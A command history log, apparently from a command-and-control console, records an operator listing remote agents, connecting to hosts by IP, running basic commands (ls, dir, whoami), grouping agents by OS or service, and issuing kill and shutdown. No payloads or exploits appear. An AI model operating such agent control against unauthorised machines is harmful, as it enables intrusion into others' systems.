2961 | # 2021-03-25 18:22:08.113445
2962 | +cmd
2963 |
2964 | # 2021-03-25 18:22:08.497295
2965 | +ls
2966 |
2967 | # 2021-03-25 18:22:33.593879
2968 | +interact a 129.21.103.180
2969 |
2970 | # 2021-03-25 18:22:34.179723
2971 | +cmd
2972 |
2973 | # 2021-03-25 18:22:34.605511
2974 | +ls
2975 |
2976 | # 2021-03-25 18:22:43.125201
2977 | +ls -la
2978 |
2979 | # 2021-03-25 18:22:48.811557
2980 | +back
2981 |
2982 | # 2021-03-25 18:22:50.482981
2983 | +agents
2984 |
2985 | # 2021-03-25 18:22:56.922790
2986 | +exit
2987 |
2988 | # 2021-03-25 18:25:43.669131
2989 | +interact a 129.21.103.180
2990 |
2991 | # 2021-03-25 18:25:44.291277
2992 | +cmd
2993 |
2994 | # 2021-03-25 18:25:45.148988
2995 | +ls
2996 |
2997 | # 2021-03-25 18:25:58.841540
2998 | +bac
2999 |
3000 | # 2021-03-25 18:26:00.033502
3001 | +back
3002 |
3003 | # 2021-03-25 18:26:00.715487
3004 | +exit
3005 |
3006 | # 2021-03-25 18:26:13.021742
3007 | +interact a 129.21.103.180
3008 |
3009 | # 2021-03-25 18:26:15.106413
3010 | +cmd
3011 |
3012 | # 2021-03-25 18:26:16.095795
3013 | +ls -la
3014 |
3015 | # 2021-03-25 18:26:32.792453
3016 | +exi
3017 |
3018 | # 2021-03-25 18:26:33.980308
3019 | +exit
3020 |
3021 | # 2021-03-25 18:28:48.575999
3022 | +inter
3023 |
3024 | # 2021-03-25 18:28:53.216875
3025 | +interact a 129.21.103.180
3026 |
3027 | # 2021-03-25 18:28:53.868832
3028 | +cmd
3029 |
3030 | # 2021-03-25 18:28:56.184398
3031 | +ls -la
3032 |
3033 | # 2021-03-25 18:32:06.566826
3034 | +interact a 129.21.103.180
3035 |
3036 | # 2021-03-25 18:32:07.275741
3037 | +cmd
3038 |
3039 | # 2021-03-25 18:32:08.557991
3040 | +ls
3041 |
3042 | # 2021-03-25 18:32:10.509313
3043 | +ls -la
3044 |
3045 | # 2021-03-25 18:32:35.142173
3046 | +exit
3047 |
3048 | # 2021-03-25 18:33:05.553501
3049 | +interact a 129.21.103.180
3050 |
3051 | # 2021-03-25 18:33:06.375419
3052 | +cmd
3053 |
3054 | # 2021-03-25 18:33:07.205687
3055 | +ls
3056 |
3057 | # 2021-03-25 18:33:08.435424
3058 | +ls -la
3059 |
3060 | # 2021-03-25 18:33:46.728083
3061 | +interact a 129.21.103.180
3062 |
3063 | # 2021-03-25 18:33:47.377022
3064 | +cmd
3065 |
3066 | # 2021-03-25 18:33:50.178810
3067 | +ls -la
3068 |
3069 | # 2021-03-25 18:34:15.728808
3070 | +interact a 129.21.103.180
3071 |
3072 | # 2021-03-25 18:34:17.078202
3073 | +cmd
3074 |
3075 | # 2021-03-25 18:34:18.459841
3076 | +ls
3077 |
3078 | # 2021-03-25 18:34:20.377839
3079 | +ls -la
3080 |
3081 | # 2021-03-25 18:35:03.655744
3082 | +interact a 129.21.103.180
3083 |
3084 | # 2021-03-25 18:35:04.684441
3085 | +cmd
3086 |
3087 | # 2021-03-25 18:35:05.510103
3088 | +ls
3089 |
3090 | # 2021-03-25 18:35:08.039306
3091 | +ls -al
3092 |
3093 | # 2021-03-25 18:35:54.140345
3094 | +interact a 129.21.103.180
3095 |
3096 | # 2021-03-25 18:35:54.769215
3097 | +cmd
3098 |
3099 | # 2021-03-25 18:35:55.189298
3100 | +ls
3101 |
3102 | # 2021-03-25 18:35:56.756153
3103 | +ls -la
3104 |
3105 | # 2021-03-25 18:36:07.065617
3106 | +back
3107 |
3108 | # 2021-03-25 18:36:09.951497
3109 | +agents
3110 |
3111 | # 2021-03-25 18:36:13.851854
3112 | +exit
3113 |
3114 | # 2021-03-25 18:37:47.046652
3115 | +inter
3116 |
3117 | # 2021-03-25 18:37:49.205618
3118 | +exit
3119 |
3120 | # 2021-03-25 18:37:56.731644
3121 | +interact a 129.21.103.180
3122 |
3123 | # 2021-03-25 18:37:57.805332
3124 | +cmd
3125 |
3126 | # 2021-03-25 18:37:58.485625
3127 | +ls
3128 |
3129 | # 2021-03-25 18:38:34.683813
3130 | +interact a 129.21.103.180
3131 |
3132 | # 2021-03-25 18:38:35.539878
3133 | +cmd
3134 |
3135 | # 2021-03-25 18:38:35.963713
3136 | +ls
3137 |
3138 | # 2021-03-25 18:38:37.110861
3139 | +ls -la
3140 |
3141 | # 2021-03-25 18:38:39.762038
3142 | +exit
3143 |
3144 | # 2021-03-25 19:20:11.932012
3145 | +interact a 129.21.103.180
3146 |
3147 | # 2021-03-25 19:20:13.005513
3148 | +cmd
3149 |
3150 | # 2021-03-25 19:20:13.435006
3151 | +ls
3152 |
3153 | # 2021-03-25 19:22:09.150491
3154 | +interact a 129.21.103.180
3155 |
3156 | # 2021-03-25 19:22:10.094186
3157 | +cmd
3158 |
3159 | # 2021-03-25 19:22:10.461391
3160 | +ls
3161 |
3162 | # 2021-03-25 19:23:06.070110
3163 | +inter
3164 |
3165 | # 2021-03-25 19:23:09.924409
3166 | +interact a 129.21.103.180
3167 |
3168 | # 2021-03-25 19:23:10.744748
3169 | +cmd
3170 |
3171 | # 2021-03-25 19:23:11.146031
3172 | +ls
3173 |
3174 | # 2021-03-25 19:24:31.497803
3175 | +interact a 129.21.103.180
3176 |
3177 | # 2021-03-25 19:24:32.531112
3178 | +cmd
3179 |
3180 | # 2021-03-25 19:24:32.915281
3181 | +ls
3182 |
3183 | # 2021-03-25 19:24:38.607121
3184 | +ls -la
3185 |
3186 | # 2021-03-25 19:26:51.197322
3187 | +interact a 129.21.103.180
3188 |
3189 | # 2021-03-25 19:26:52.000576
3190 | +cmd
3191 |
3192 | # 2021-03-25 19:26:52.510568
3193 | +ls
3194 |
3195 | # 2021-03-25 19:27:27.180918
3196 | +interact a 129.21.103.180
3197 |
3198 | # 2021-03-25 19:27:28.042161
3199 | +cmd
3200 |
3201 | # 2021-03-25 19:27:29.000225
3202 | +ls
3203 |
3204 | # 2021-03-25 19:27:35.411267
3205 | +ls -la
3206 |
3207 | # 2021-03-25 19:29:13.128432
3208 | +interact a 129.21.103.180
3209 |
3210 | # 2021-03-25 19:29:14.027095
3211 | +cmd
3212 |
3213 | # 2021-03-25 19:29:14.451919
3214 | +ls
3215 |
3216 | # 2021-03-25 19:29:16.998987
3217 | +ls -la
3218 |
3219 | # 2021-03-25 19:29:19.455000
3220 | +ls a
3221 |
3222 | # 2021-03-25 19:29:20.875900
3223 | +ls
3224 |
3225 | # 2021-03-25 19:29:23.811225
3226 | +back
3227 |
3228 | # 2021-03-25 19:29:24.510940
3229 | +exit
3230 |
3231 | # 2021-03-25 19:30:48.814745
3232 | +interact a 129.21.103.180
3233 |
3234 | # 2021-03-25 19:30:49.471556
3235 | +cmd
3236 |
3237 | # 2021-03-25 19:30:50.005198
3238 | +1
3239 |
3240 | # 2021-03-25 19:30:50.789646
3241 | +2
3242 |
3243 | # 2021-03-25 19:30:51.335719
3244 | +3
3245 |
3246 | # 2021-03-25 19:30:51.897630
3247 | +4
3248 |
3249 | # 2021-03-25 19:30:52.449817
3250 | +5
3251 |
3252 | # 2021-03-25 19:30:53.394571
3253 | +6
3254 |
3255 | # 2021-03-25 19:30:53.976896
3256 | +7
3257 |
3258 | # 2021-03-25 19:30:56.173989
3259 | +12
3260 |
3261 | # 2021-03-25 19:30:57.101943
3262 | +123
3263 |
3264 | # 2021-03-25 19:30:58.473986
3265 | +1234
3266 |
3267 | # 2021-03-25 19:30:59.922237
3268 | +12345
3269 |
3270 | # 2021-03-25 19:31:02.158221
3271 | +123456
3272 |
3273 | # 2021-03-25 19:31:04.359098
3274 | +1234567
3275 |
3276 | # 2021-03-25 19:31:06.076632
3277 | +clear
3278 |
3279 | # 2021-03-25 19:31:07.506166
3280 | +ack
3281 |
3282 | # 2021-03-25 19:31:08.396360
3283 | +back
3284 |
3285 | # 2021-03-25 19:31:10.221067
3286 | +exit
3287 |
3288 | # 2021-03-25 19:32:18.256220
3289 | +interact a 129.21.103.180
3290 |
3291 | # 2021-03-25 19:32:18.822344
3292 | +cmd
3293 |
3294 | # 2021-03-25 19:32:19.240492
3295 | +ls
3296 |
3297 | # 2021-03-25 19:32:55.415709
3298 | +back
3299 |
3300 | # 2021-03-25 19:32:56.056801
3301 | +exit
3302 |
3303 | # 2021-03-25 19:33:01.402860
3304 | +ls
3305 |
3306 | # 2021-03-25 19:33:03.516483
3307 | +interact a 129.21.103.180
3308 |
3309 | # 2021-03-25 19:33:04.168995
3310 | +cmd
3311 |
3312 | # 2021-03-25 19:33:04.589071
3313 | +ls
3314 |
3315 | # 2021-03-25 19:33:06.875509
3316 | +ls -la
3317 |
3318 | # 2021-03-25 19:33:41.752854
3319 | +ls
3320 |
3321 | # 2021-03-25 19:33:42.998749
3322 | +ls -la
3323 |
3324 | # 2021-03-25 19:33:45.491002
3325 | +clear
3326 |
3327 | # 2021-03-25 19:33:48.983132
3328 | +which go
3329 |
3330 | # 2021-03-25 19:33:52.047901
3331 | +back
3332 |
3333 | # 2021-03-25 19:33:54.831583
3334 | +ping
3335 |
3336 | # 2021-03-25 19:33:57.309032
3337 | +kill
3338 |
3339 | # 2021-03-25 19:35:19.523238
3340 | +exit
3341 |
3342 | # 2021-03-25 19:35:23.807641
3343 | +agents
3344 |
3345 | # 2021-03-25 19:35:27.569946
3346 | +interact a 129.21.103.180
3347 |
3348 | # 2021-03-25 19:35:28.267739
3349 | +cmd
3350 |
3351 | # 2021-03-25 19:35:28.814778
3352 | +ls
3353 |
3354 | # 2021-03-25 19:35:30.345830
3355 | +ls -la
3356 |
3357 | # 2021-03-25 19:35:55.095794
3358 | +interact a 129.21.103.180
3359 |
3360 | # 2021-03-25 19:35:55.731297
3361 | +cmd
3362 |
3363 | # 2021-03-25 19:35:56.137026
3364 | +ls
3365 |
3366 | # 2021-03-25 19:35:58.052991
3367 | +ls -la
3368 |
3369 | # 2021-03-25 19:40:29.973804
3370 | +interact a 129.21.103.180
3371 |
3372 | # 2021-03-25 19:40:30.622042
3373 | +cmd
3374 |
3375 | # 2021-03-25 19:40:30.994208
3376 | +ls
3377 |
3378 | # 2021-03-25 19:40:32.302273
3379 | +ls -la
3380 |
3381 | # 2021-03-25 19:40:34.895131
3382 | +which go
3383 |
3384 | # 2021-03-25 19:40:35.892989
3385 | +back
3386 |
3387 | # 2021-03-25 19:40:37.157514
3388 | +exit
3389 |
3390 | # 2021-03-25 19:44:28.235881
3391 | +interact a 129.21.103.180
3392 |
3393 | # 2021-03-25 19:44:29.762926
3394 | +cmd
3395 |
3396 | # 2021-03-25 19:44:30.886340
3397 | +ls
3398 |
3399 | # 2021-03-25 19:44:33.945491
3400 | +ls -al
3401 |
3402 | # 2021-03-25 19:48:26.371812
3403 | +clear
3404 |
3405 | # 2021-03-25 19:48:27.924485
3406 | +interact a 129.21.103.180
3407 |
3408 | # 2021-03-25 19:48:29.749845
3409 | +back
3410 |
3411 | # 2021-03-25 19:48:34.225181
3412 | +interact a 127.0.0.1
3413 |
3414 | # 2021-03-25 19:48:35.214285
3415 | +cmd
3416 |
3417 | # 2021-03-25 19:48:35.583448
3418 | +ls
3419 |
3420 | # 2021-03-25 19:48:37.316604
3421 | +ls -la
3422 |
3423 | # 2021-03-25 19:48:38.973124
3424 | +back
3425 |
3426 | # 2021-03-25 19:48:46.504658
3427 | +interact a 129.21.103.180
3428 |
3429 | # 2021-03-25 19:48:50.015876
3430 | +help
3431 |
3432 | # 2021-03-25 19:48:52.352207
3433 | +cmd
3434 |
3435 | # 2021-03-25 19:48:52.854007
3436 | +ls
3437 |
3438 | # 2021-03-25 19:49:42.332072
3439 | +interact a 129.21.103.180
3440 |
3441 | # 2021-03-25 19:49:43.034782
3442 | +cmd
3443 |
3444 | # 2021-03-25 19:49:43.600114
3445 | +ls
3446 |
3447 | # 2021-03-25 19:49:44.747917
3448 | +ls -la
3449 |
3450 | # 2021-03-25 19:49:50.842470
3451 | +ls
3452 |
3453 | # 2021-03-25 19:49:52.341311
3454 | +ls -la
3455 |
3456 | # 2021-03-25 19:49:56.037291
3457 | +which go
3458 |
3459 | # 2021-03-25 19:49:58.128253
3460 | +back
3461 |
3462 | # 2021-03-25 19:49:59.349800
3463 | +exit
3464 |
3465 | # 2021-03-25 21:49:47.015323
3466 | +agents
3467 |
3468 | # 2021-03-25 21:49:58.615389
3469 | +interact a 129.21.21.1
3470 |
3471 | # 2021-03-25 21:49:59.792089
3472 | +cmd
3473 |
3474 | # 2021-03-25 21:50:01.481364
3475 | +dir
3476 |
3477 | # 2021-03-25 21:50:09.798270
3478 | +whoami
3479 |
3480 | # 2021-03-25 21:51:15.656846
3481 | +agents
3482 |
3483 | # 2021-03-25 21:51:19.578989
3484 | +db
3485 |
3486 | # 2021-03-25 21:51:20.466793
3487 | +removeall
3488 |
3489 | # 2021-03-25 21:51:22.103948
3490 | +back
3491 |
3492 | # 2021-03-25 21:51:22.764966
3493 | +exit
3494 |
3495 | # 2021-03-25 22:02:08.082317
3496 | +agents
3497 |
3498 | # 2021-03-25 22:03:00.121547
3499 | +db
3500 |
3501 | # 2021-03-25 22:03:01.258545
3502 | +agents
3503 |
3504 | # 2021-03-25 22:03:02.489435
3505 | +back
3506 |
3507 | # 2021-03-25 22:03:19.877142
3508 | +agents
3509 |
3510 | # 2021-03-25 22:04:51.823938
3511 | +back
3512 |
3513 | # 2021-03-25 22:04:52.731954
3514 | +exit
3515 |
3516 | # 2021-03-25 22:07:07.003172
3517 | +agents
3518 |
3519 | # 2021-03-25 22:07:09.671101
3520 | +exit
3521 |
3522 | # 2021-03-25 22:08:45.425882
3523 | +interact a 129.21.103.180
3524 |
3525 | # 2021-03-25 22:08:46.145889
3526 | +cmd
3527 |
3528 | # 2021-03-25 22:08:46.532591
3529 | +ls
3530 |
3531 | # 2021-03-25 22:08:48.902607
3532 | +ls -la
3533 |
3534 | # 2021-03-25 22:10:10.745173
3535 | +agents
3536 |
3537 | # 2021-03-25 22:10:16.784373
3538 | +exit
3539 |
3540 | # 2021-03-25 22:13:24.689064
3541 | +agents
3542 |
3543 | # 2021-03-25 22:28:27.320645
3544 | +exit
3545 |
3546 | # 2021-03-25 22:40:31.799899
3547 | +agents
3548 |
3549 | # 2021-03-30 21:59:42.024948
3550 | +db
3551 |
3552 | # 2021-03-30 21:59:43.283624
3553 | +removeall
3554 |
3555 | # 2021-03-30 21:59:49.787398
3556 | +back
3557 |
3558 | # 2021-03-30 21:59:55.988165
3559 | +agents
3560 |
3561 | # 2021-04-01 13:13:06.366177
3562 | +interact a 129.21.100.213
3563 |
3564 | # 2021-04-01 13:13:07.711435
3565 | +ping
3566 |
3567 | # 2021-04-01 13:13:12.543463
3568 | +back
3569 |
3570 | # 2021-04-01 13:13:13.482405
3571 | +agents
3572 |
3573 | # 2021-04-01 13:13:18.642254
3574 | +interact a 129.21.100.213
3575 |
3576 | # 2021-04-01 13:13:22.935296
3577 | +cmd
3578 |
3579 | # 2021-04-01 13:13:23.539906
3580 | +ls
3581 |
3582 | # 2021-04-01 13:13:26.069423
3583 | +ls -la
3584 |
3585 | # 2021-04-01 13:13:27.392024
3586 | +back
3587 |
3588 | # 2021-04-01 13:13:31.648661
3589 | +agents
3590 |
3591 | # 2021-04-01 13:13:40.287713
3592 | +db
3593 |
3594 | # 2021-04-01 13:15:14.929233
3595 | +removeall
3596 |
3597 | # 2021-04-01 13:15:16.865082
3598 | +exit
3599 |
3600 | # 2021-04-01 14:38:57.110775
3601 | +interact a 129.21.100.213
3602 |
3603 | # 2021-04-01 14:38:57.995686
3604 | +cmd
3605 |
3606 | # 2021-04-01 14:38:59.712394
3607 | +ls
3608 |
3609 | # 2021-04-01 14:39:06.194177
3610 | +back
3611 |
3612 | # 2021-04-01 14:39:08.521875
3613 | +agents
3614 |
3615 | # 2021-04-01 14:39:09.722879
3616 | +exit
3617 |
3618 | # 2021-04-01 14:43:38.036656
3619 | +agents
3620 |
3621 | # 2021-04-01 14:44:03.336866
3622 | +exit
3623 |
3624 | # 2021-04-01 14:45:34.060726
3625 | +agetns
3626 |
3627 | # 2021-04-01 14:45:35.304697
3628 | +agents
3629 |
3630 | # 2021-04-01 14:46:03.173472
3631 | +exut
3632 |
3633 | # 2021-04-01 14:46:04.207542
3634 | +exit
3635 |
3636 | # 2021-04-01 15:05:44.931866
3637 | +agents
3638 |
3639 | # 2021-04-01 15:06:27.715068
3640 | +exit
3641 |
3642 | # 2021-04-01 15:06:43.093244
3643 | +db
3644 |
3645 | # 2021-04-01 15:06:49.250260
3646 | +agents
3647 |
3648 | # 2021-04-01 15:06:54.938784
3649 | +db
3650 |
3651 | # 2021-04-01 15:06:56.565862
3652 | +help
3653 |
3654 | # 2021-04-01 15:07:09.829938
3655 | +group 129.21.21.1-10 os windows
3656 |
3657 | # 2021-04-01 15:07:12.880635
3658 | +agents
3659 |
3660 | # 2021-04-01 15:07:14.927654
3661 | +back
3662 |
3663 | # 2021-04-01 15:07:16.261205
3664 | +agents
3665 |
3666 | # 2021-04-01 15:07:17.320888
3667 | +exit
3668 |
3669 | # 2021-04-01 15:07:39.683240
3670 | +interact o windows
3671 |
3672 | # 2021-04-01 15:07:41.061273
3673 | +ls
3674 |
3675 | # 2021-04-01 15:07:41.940577
3676 | +list
3677 |
3678 | # 2021-04-01 15:07:43.000317
3679 | +agents
3680 |
3681 | # 2021-04-01 15:07:45.270269
3682 | +help
3683 |
3684 | # 2021-04-01 15:07:47.347585
3685 | +ping
3686 |
3687 | # 2021-04-01 15:07:53.666277
3688 | +help
3689 |
3690 | # 2021-04-01 15:07:55.333598
3691 | +cmd
3692 |
3693 | # 2021-04-01 15:07:55.739362
3694 | +ls
3695 |
3696 | # 2021-04-01 15:07:59.369936
3697 | +back
3698 |
3699 | # 2021-04-01 15:08:01.074708
3700 | +agents
3701 |
3702 | # 2021-04-01 15:08:02.181443
3703 | +back
3704 |
3705 | # 2021-04-01 15:08:03.034172
3706 | +agents
3707 |
3708 | # 2021-04-01 15:08:04.692867
3709 | +exit
3710 |
3711 | # 2021-04-01 15:09:36.395075
3712 | +agents
3713 |
3714 | # 2021-04-01 15:10:03.954598
3715 | +exit
3716 |
3717 | # 2021-04-01 15:55:41.652508
3718 | +agents
3719 |
3720 | # 2021-04-01 15:55:54.491721
3721 | +interact a 129.21.100.213
3722 |
3723 | # 2021-04-01 15:55:55.229268
3724 | +cmd
3725 |
3726 | # 2021-04-01 15:55:55.787865
3727 | +ls
3728 |
3729 | # 2021-04-01 15:56:03.305071
3730 | +ls -la
3731 |
3732 | # 2021-04-01 15:56:06.948884
3733 | +echo basically yeah
3734 |
3735 | # 2021-04-01 15:56:17.608275
3736 | +back
3737 |
3738 | # 2021-04-01 15:56:18.388050
3739 | +agents
3740 |
3741 | # 2021-04-01 15:56:29.245578
3742 | +back
3743 |
3744 | # 2021-04-01 15:56:30.142718
3745 | +agents
3746 |
3747 | # 2021-04-01 15:56:32.187640
3748 | +db
3749 |
3750 | # 2021-04-01 15:56:33.278837
3751 | +removeall
3752 |
3753 | # 2021-04-01 15:56:34.841967
3754 | +back
3755 |
3756 | # 2021-04-01 15:56:35.578441
3757 | +agents
3758 |
3759 | # 2021-04-01 15:56:36.665896
3760 | +exit
3761 |
3762 | # 2021-04-02 11:13:17.013814
3763 | +help
3764 |
3765 | # 2021-04-02 11:13:19.344944
3766 | +shutdown
3767 |
3768 | # 2021-04-02 11:13:35.415912
3769 | +agents
3770 |
3771 | # 2021-04-02 11:13:41.359386
3772 | +exit
3773 |
3774 | # 2021-04-02 11:14:52.982350
3775 | +shutdown
3776 |
3777 | # 2021-04-02 11:15:35.655971
3778 | +interact a 129.21.100.213
3779 |
3780 | # 2021-04-02 11:15:36.639848
3781 | +cmd
3782 |
3783 | # 2021-04-02 11:15:37.098402
3784 | +ls
3785 |
3786 | # 2021-04-02 11:15:38.637536
3787 | +back
3788 |
3789 | # 2021-04-02 11:15:39.444637
3790 | +ping
3791 |
3792 | # 2021-04-02 11:15:41.282161
3793 | +back
3794 |
3795 | # 2021-04-02 11:15:42.534821
3796 | +ls
3797 |
3798 | # 2021-04-02 11:15:43.809853
3799 | +help
3800 |
3801 | # 2021-04-02 11:15:45.481598
3802 | +agent
3803 |
3804 | # 2021-04-02 11:15:47.467111
3805 | +agents
3806 |
3807 | # 2021-04-02 11:16:22.503522
3808 | +shutdown
3809 |
3810 | # 2021-04-02 11:21:25.104118
3811 | +shutodwn
3812 |
3813 | # 2021-04-02 11:21:27.320359
3814 | +shutdown
3815 |
3816 | # 2021-04-02 11:40:19.715618
3817 | +shutodown
3818 |
3819 | # 2021-04-02 11:40:21.048187
3820 | +shutdown
3821 |
3822 | # 2021-04-02 11:40:47.442268
3823 | +exit
3824 |
3825 | # 2021-04-02 11:41:14.633390
3826 | +shutdown
3827 |
3828 | # 2021-04-02 11:42:24.850048
3829 | +agents
3830 |
3831 | # 2021-04-02 11:42:26.705999
3832 | +exit
3833 |
3834 | # 2021-04-02 11:42:37.310184
3835 | +agents
3836 |
3837 | # 2021-04-02 11:42:40.267506
3838 | +shutdown
3839 |
3840 | # 2021-04-02 11:44:05.563469
3841 | +agents
3842 |
3843 | # 2021-04-02 11:44:11.229740
3844 | +shutdown
3845 |
3846 | # 2021-04-03 01:26:30.537722
3847 | +agents
3848 |
3849 | # 2021-04-03 01:28:23.819566
3850 | +db
3851 |
3852 | # 2021-04-03 01:28:27.354196
3853 | +back
3854 |
3855 | # 2021-04-03 01:28:32.499593
3856 | +exit
3857 |
3858 | # 2021-04-03 11:41:16.022559
3859 | +agents
3860 |
3861 | # 2021-04-03 11:41:17.957462
3862 | +db
3863 |
3864 | # 2021-04-03 11:41:19.044846
3865 | +back
3866 |
3867 | # 2021-04-03 11:41:19.949315
3868 | +help
3869 |
3870 | # 2021-04-03 11:41:23.134089
3871 | +interact a 129.21.100.213
3872 |
3873 | # 2021-04-03 11:42:49.870589
3874 | +agents
3875 |
3876 | # 2021-04-03 11:42:55.794872
3877 | +interact a 129.21.100.213
3878 |
3879 | # 2021-04-03 11:45:38.397208
3880 | +binus
3881 |
3882 | # 2021-04-03 11:46:49.572763
3883 | +help
3884 |
3885 | # 2021-04-03 11:46:55.273327
3886 | +agents
3887 |
3888 | # 2021-04-03 11:46:56.818038
3889 | +db
3890 |
3891 | # 2021-04-03 11:46:57.715808
3892 | +back
3893 |
3894 | # 2021-04-03 11:47:03.041823
3895 | +exit
3896 |
3897 | # 2021-04-03 11:47:07.965041
3898 | +agents
3899 |
3900 | # 2021-04-03 11:47:09.701146
3901 | +help
3902 |
3903 | # 2021-04-03 11:47:13.998165
3904 | +shutdown
3905 |
3906 | # 2021-04-03 11:49:54.454274
3907 | +agents
3908 |
3909 | # 2021-04-03 11:49:59.293339
3910 | +interact a 129.21.100.213
3911 |
3912 | # 2021-04-03 11:57:09.719511
3913 | +clear
3914 |
3915 | # 2021-04-03 11:57:12.119982
3916 | +agents
3917 |
3918 | # 2021-04-03 11:57:14.625897
3919 | +help
3920 |
3921 | # 2021-04-03 11:57:17.953398
3922 | +agents
3923 |
3924 | # 2021-04-03 11:57:19.880386
3925 | +exit
3926 |
3927 | # 2021-04-03 11:57:56.309801
3928 | +bingus
3929 |
3930 | # 2021-04-03 11:58:23.611305
3931 | +agents
3932 |
3933 | # 2021-04-03 11:58:25.053949
3934 | +bingus
3935 |
3936 | # 2021-04-03 12:02:07.183327
3937 | +help
3938 |
3939 | # 2021-04-03 12:02:10.485785
3940 | +agents
3941 |
3942 | # 2021-04-03 12:02:11.785009
3943 | +exit
3944 |
3945 | # 2021-04-03 12:03:52.413700
3946 | +bingus
3947 |
3948 | # 2021-04-03 12:04:06.395518
3949 | +binugs
3950 |
3951 | # 2021-04-03 12:04:44.322360
3952 | +agents
3953 |
3954 | # 2021-04-03 12:05:17.201067
3955 | +bingus
3956 |
3957 | # 2021-04-03 12:06:30.558561
3958 | +binugs
3959 |
3960 | # 2021-04-03 12:06:33.960242
3961 | +interact a 129.21.100.213
3962 |
3963 | # 2021-04-03 12:11:07.096119
3964 | +agents
3965 |
3966 | # 2021-04-03 12:11:09.145293
3967 | +interact a 129.21.100.213
3968 |
3969 | # 2021-04-03 12:11:36.835952
3970 | +ping
3971 |
3972 | # 2021-04-03 12:11:41.291533
3973 | +kill
3974 |
3975 | # 2021-04-03 12:11:45.510019
3976 | +back
3977 |
3978 | # 2021-04-03 12:11:47.966284
3979 | +agents
3980 |
3981 | # 2021-04-03 12:11:52.321993
3982 | +interact a 129.21.100.213
3983 |
3984 | # 2021-04-03 12:11:53.411551
3985 | +cmd
3986 |
3987 | # 2021-04-03 12:11:53.819632
3988 | +ls
3989 |
3990 | # 2021-04-03 12:11:57.282036
3991 | +back
3992 |
3993 | # 2021-04-03 12:11:58.568530
3994 | +exit
3995 |
3996 | # 2021-04-03 12:13:30.317184
3997 | +interact a 129.21.100.213
3998 |
3999 | # 2021-04-03 12:13:31.052700
4000 | +cmd
4001 |
4002 | # 2021-04-03 12:13:31.389928
4003 | +ls
4004 |
4005 | # 2021-04-03 12:13:39.343205
4006 | +clear
4007 |
4008 | # 2021-04-03 12:13:41.519295
4009 | +help
4010 |
4011 | # 2021-04-03 12:13:43.203920
4012 | +back
4013 |
4014 | # 2021-04-03 12:13:45.445955
4015 | +help
4016 |
4017 | # 2021-04-03 12:13:47.565741
4018 | +agents
4019 |
4020 | # 2021-04-03 12:13:59.813476
4021 | +back
4022 |
4023 | # 2021-04-03 12:14:03.879953
4024 | +interact a 8.8.8.8
4025 |
4026 | # 2021-04-03 12:14:09.181010
4027 | +ping
4028 |
4029 | # 2021-04-03 12:14:15.449466
4030 | +back
4031 |
4032 | # 2021-04-03 12:14:16.138522
4033 | +exit
4034 |
4035 | # 2021-04-03 12:20:27.367708
4036 | +db
4037 |
4038 | # 2021-04-03 12:20:28.666476
4039 | +help
4040 |
4041 | # 2021-04-03 12:20:31.607157
4042 | +meta
4043 |
4044 | # 2021-04-03 12:20:37.537709
4045 | +agents
4046 |
4047 | # 2021-04-03 12:20:41.885818
4048 | +back
4049 |
4050 | # 2021-04-03 12:20:43.249359
4051 | +db
4052 |
4053 | # 2021-04-03 12:20:43.916723
4054 | +help
4055 |
4056 | # 2021-04-03 12:20:58.707161
4057 | +group 1.245.21.216 service malware
4058 |
4059 | # 2021-04-03 12:21:01.008818
4060 | +agents
4061 |
4062 | # 2021-04-03 12:21:12.215779
4063 | +removeall
4064 |
4065 | # 2021-04-03 12:21:24.576866
4066 | +db
4067 |
4068 | # 2021-04-03 12:21:25.564449
4069 | +agents
4070 |
4071 | # 2021-04-03 12:21:26.799997
4072 | +removeall
4073 |
4074 | # 2021-04-03 12:21:29.644561
4075 | +agents
4076 |
4077 | # 2021-04-03 12:21:31.796506
4078 | +removeall
4079 |
4080 | # 2021-04-03 12:21:34.126740
4081 | +agents
4082 |
4083 | # 2021-04-03 12:21:35.498325
4084 | +exit
4085 |
4086 | # 2021-04-03 12:21:36.518628
4087 | +back
4088 |
4089 | # 2021-04-03 12:21:37.673134
4090 | +exit
4091 |
4092 | # 2021-04-03 12:22:30.721357
4093 | +agents
4094 |
4095 | # 2021-04-03 12:24:33.324647
4096 | +exit
4097 |
4098 | # 2021-04-03 12:25:18.721136
4099 | +agents
4100 |
4101 | # 2021-04-03 12:25:27.775809
4102 | +db
4103 |
4104 | # 2021-04-03 12:25:42.305346
4105 | +group 10.10.10.10 service ftp
4106 |
4107 | # 2021-04-03 12:25:44.613842
4108 | +agents
4109 |
4110 | # 2021-04-03 12:25:48.251792
4111 | +back
4112 |
4113 | # 2021-04-03 12:25:52.083591
4114 | +interact service ftp
4115 |
4116 | # 2021-04-03 12:25:54.026660
4117 | +agents
4118 |
4119 | # 2021-04-03 12:25:58.473447
4120 | +back
4121 |
4122 | # 2021-04-03 12:26:00.481996
4123 | +db
4124 |
4125 | # 2021-04-03 12:26:05.466922
4126 | +group 10.10.10.10 os windows
4127 |
4128 | # 2021-04-03 12:26:06.639510
4129 | +back
4130 |
4131 | # 2021-04-03 12:26:07.687074
4132 | +agents
4133 |
4134 | # 2021-04-03 12:26:12.158396
4135 | +interact os windows
4136 |
4137 | # 2021-04-03 12:26:14.410385
4138 | +agents
4139 |
4140 | # 2021-04-03 12:26:18.664480
4141 | +back
4142 |
4143 | # 2021-04-03 12:26:19.800415
4144 | +agents
4145 |
4146 | # 2021-04-03 12:26:23.400972
4147 | +exit
4148 |
4149 | # 2021-04-03 12:27:12.496921
4150 | +interact os windows
4151 |
4152 | # 2021-04-03 12:27:13.711012
4153 | +agents
4154 |
4155 | # 2021-04-03 12:27:18.378699
4156 | +back
4157 |
4158 | # 2021-04-03 12:27:18.977157
4159 | +exit
4160 |
4161 | # 2021-04-03 12:28:06.695689
4162 | +interact os windows
4163 |
4164 | # 2021-04-03 12:28:08.876707
4165 | +agents
4166 |
4167 | # 2021-04-03 12:28:11.256296
4168 | +back
4169 |
4170 | # 2021-04-03 12:28:12.409305
4171 | +agents
4172 |
4173 | # 2021-04-03 12:28:14.838115
4174 | +exit
4175 |
4176 | # 2021-04-03 12:29:05.324087
4177 | +interact os windows
4178 |
4179 | # 2021-04-03 12:29:07.226254
4180 | +agents
4181 |
4182 | # 2021-04-03 12:29:18.685474
4183 | +back
4184 |
4185 | # 2021-04-03 12:29:19.241696
4186 | +exit
4187 |
4188 | # 2021-04-03 12:30:57.025529
4189 | +interact os windows
4190 |
4191 | # 2021-04-03 12:30:58.916684
4192 | +agnets
4193 |
4194 | # 2021-04-03 12:31:00.092248
4195 | +agents
4196 |
4197 | # 2021-04-03 12:31:01.242931
4198 | +back
4199 |
